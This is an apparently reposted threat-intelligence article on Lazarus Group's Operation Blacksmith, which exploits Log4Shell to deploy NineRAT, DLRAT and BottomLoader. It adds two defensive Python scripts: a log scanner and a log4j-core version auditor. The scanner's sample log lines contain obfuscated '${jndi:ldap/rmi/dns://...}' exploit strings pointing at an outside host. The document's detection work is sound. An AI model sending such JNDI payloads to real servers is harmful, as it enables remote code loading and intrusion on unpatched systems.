Lazarus Group Exploits Log4j Vulnerability to Deploy RATs

admin · 2023-12-12 15:56:06 · 32 views · 5,821 characters, about 19 min read

The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts.

Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families: a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.

The cybersecurity firm described the adversary's latest tactics as a definitive shift, and noted that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella.

"Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said in a technical report shared with The Hacker News.

Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly accessible VMware Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.
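Log4Shell exploitation against an internet-facing server such as VMware Horizon shows up in the web tier as a `${jndi:...}` lookup in any logged field (User-Agent, query string, headers), frequently wrapped in nested `${lower:...}`, `${upper:...}` or `${...:-default}` lookups to defeat naive string matching. The following triage script is an added example, not code from the Talos report or from this article: it peels those obfuscation layers off and reports which client sent a JNDI lookup and which scheme (ldap, rmi, dns) it used. The access-log lines, IP addresses and payloads are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not taken from the Talos report). Line 1 is
# benign; lines 2-4 carry JNDI lookups in the User-Agent or query string, the last two
# using the nested-lookup obfuscation seen in real Log4Shell scanning traffic.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2023:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2023:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - [10/Dec/2023:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:r}mi://203.0.113.10:1099/x}"',
    '10.0.0.8 - - [10/Dec/2023:10:01:05 +0000] '
    '"GET /portal/?q=${${env:NaN:-j}ndi${env:NaN:-:}dns://203.0.113.10/c} HTTP/1.1" 404 0 "-" "curl/7.88"',
]

# ${lower:x} / ${upper:x} inner lookups, and any lookup with a :-default fallback
# (e.g. ${env:NaN:-j}, ${::-j}) that resolves to its default when the key is unset.
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What the lookups collapse to: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Resolve innermost obfuscating lookups until the string stops changing.

    The regexes only match lookups with no nested '${' inside, so each round
    peels one layer; max_rounds bounds the work on hostile input.
    """
    for _ in range(max_rounds):
        new = LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_scheme(text: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if a lookup is present, else None."""
    m = JNDI.search(normalize_lookups(text))
    return m.group(1).lower() if m else None


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Flag lines containing a (possibly obfuscated) JNDI lookup, with client IP and scheme."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi_scheme(line)
        if scheme is not None:
            hits.append({"line": number, "client": line.split(" ", 1)[0], "scheme": scheme})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['client']} sent a jndi:{hit['scheme']} lookup")
```

This is a triage heuristic, not a complete Log4j lookup evaluator: it handles the case-conversion and default-value tricks that make up most scanner traffic, but an attacker can nest other lookup types, so a hit is a reason to pull the host's JVM logs and outbound LDAP/RMI/DNS connections, and a miss is not proof of absence.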

The abuse of Log4Shell is not surprising given that, according to Veracode, 2.8% of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) two years after public disclosure, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.
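The version ranges above are easy to get wrong by hand because of the `2.0-beta9` lower bound, which sorts before `2.0` proper. The script below is an added example (not Veracode's tooling or anything from this article) that parses `log4j-core-<version>.jar` file names, orders pre-releases correctly, and classifies each against the ranges the article quotes. The entries for 2.16.0 (CVE-2021-45105, fixed in 2.17.0) and 2.17.1 (the fix for CVE-2021-44832) come from the Apache Log4j security page rather than from this article; the file paths are constructed.

```python
import re
from typing import List, Tuple

# Version ranges as given in the article (Veracode figures): 2.0-beta9 through 2.15.0
# are vulnerable to CVE-2021-44228; 2.17.0 is not, but is affected by CVE-2021-44832.
# 2.16.0 and 2.17.1 below are taken from the Apache Log4j security page, not the article.
JAR_NAME = re.compile(r"log4j-core-(\d+(?:\.\d+)*(?:-(?:alpha|beta|rc)\d*)?)\.jar$", re.IGNORECASE)
PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
FINAL_RANK = 9  # a final release sorts after any pre-release of the same number


def parse_version(version: str) -> Tuple[int, int, int, int, int]:
    """Turn '2.0-beta9' or '2.15.0' into a key that sorts the way Log4j releases do."""
    core, _, pre = version.partition("-")
    nums = [int(part) for part in core.split(".")][:3]
    nums += [0] * (3 - len(nums))
    if not pre:
        return (nums[0], nums[1], nums[2], FINAL_RANK, 0)
    m = re.fullmatch(r"(alpha|beta|rc)(\d*)", pre, re.IGNORECASE)
    if m is None:
        raise ValueError(f"unrecognised pre-release tag in {version!r}")
    return (nums[0], nums[1], nums[2], PRERELEASE_RANK[m.group(1).lower()], int(m.group(2) or 0))


V_2_0_BETA9 = parse_version("2.0-beta9")
V_2_15_0 = parse_version("2.15.0")
V_2_17_0 = parse_version("2.17.0")
V_2_17_1 = parse_version("2.17.1")


def classify(version: str) -> str:
    """Map a log4j-core version to the CVE status implied by the ranges above."""
    key = parse_version(version)
    if key < V_2_0_BETA9:
        return "older than 2.0-beta9: outside the ranges given in the article"
    if key <= V_2_15_0:
        return "CVE-2021-44228 (Log4Shell)"
    if key < V_2_17_0:
        return "2.16.x: CVE-2021-45105 (denial of service; fixed in 2.17.0)"
    if key < V_2_17_1:
        return "CVE-2021-44832 (not CVE-2021-44228)"
    return "not affected by the CVEs discussed here"


def audit_jar_paths(paths: List[str]) -> List[Tuple[str, str, str]]:
    """Return (path, version, status) for every log4j-core jar in the list."""
    findings = []
    for path in paths:
        m = JAR_NAME.search(path)
        if m:
            findings.append((path, m.group(1), classify(m.group(1))))
    return findings


# Constructed file listing, e.g. the output of `find / -name 'log4j-core-*.jar'`.
SAMPLE_PATHS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",          # api jar has no JndiLookup class; ignored
    "/opt/legacy/lib/log4j-core-2.0-beta9.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta8.jar",
    "/opt/other/lib/log4j-core-2.17.0.jar",
    "/opt/patched/lib/log4j-core-2.17.1.jar",
]

if __name__ == "__main__":
    for path, version, status in audit_jar_paths(SAMPLE_PATHS):
        print(f"{version:>10}  {status}  {path}")
```

A file-name sweep is only a first pass: Log4j is often shaded into fat jars or nested inside WAR/EAR archives under a different name, so a thorough audit also lists archive contents for `org/apache/logging/log4j/core/lookup/JndiLookup.class` and reads the version from the bundled manifest.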

NineRAT, first developed around May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization, and then again in September 2023 on a European manufacturing entity. By using a legitimate messaging service like Telegram for C2 communications, the goal is to evade detection.

The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.

"Once NineRAT is activated it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems," the researchers noted.

"Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase."

Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad, which Microsoft previously identified as being used by the threat actor in intrusions weaponizing a critical security flaw in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.

Furthermore, Operation Blacksmith has been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them in the compromised systems.

"The multiple tools giving overlapping backdoor entry present Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access," the researchers said.

The exploitation of Log4Shell by Andariel is not new, for the hacking crew has used the vulnerability as an initial access vector in the past to deliver a remote access trojan referred to as EarlyRat.

The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT, distributed via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.

Kimsuky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group.

It was sanctioned by the U.S. Treasury Department on November 30, 2023, for gathering intelligence to support the regime's strategic objectives.

"After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published last week.

Originally published on the WeChat public account 知机安全: Lazarus Group Exploits Log4j Vulnerability to Deploy RATs

Reposted on CN-SEC中文网 (please retain this link when reposting; credit to the original author): http://cn-sec.com/archives/2289942.html
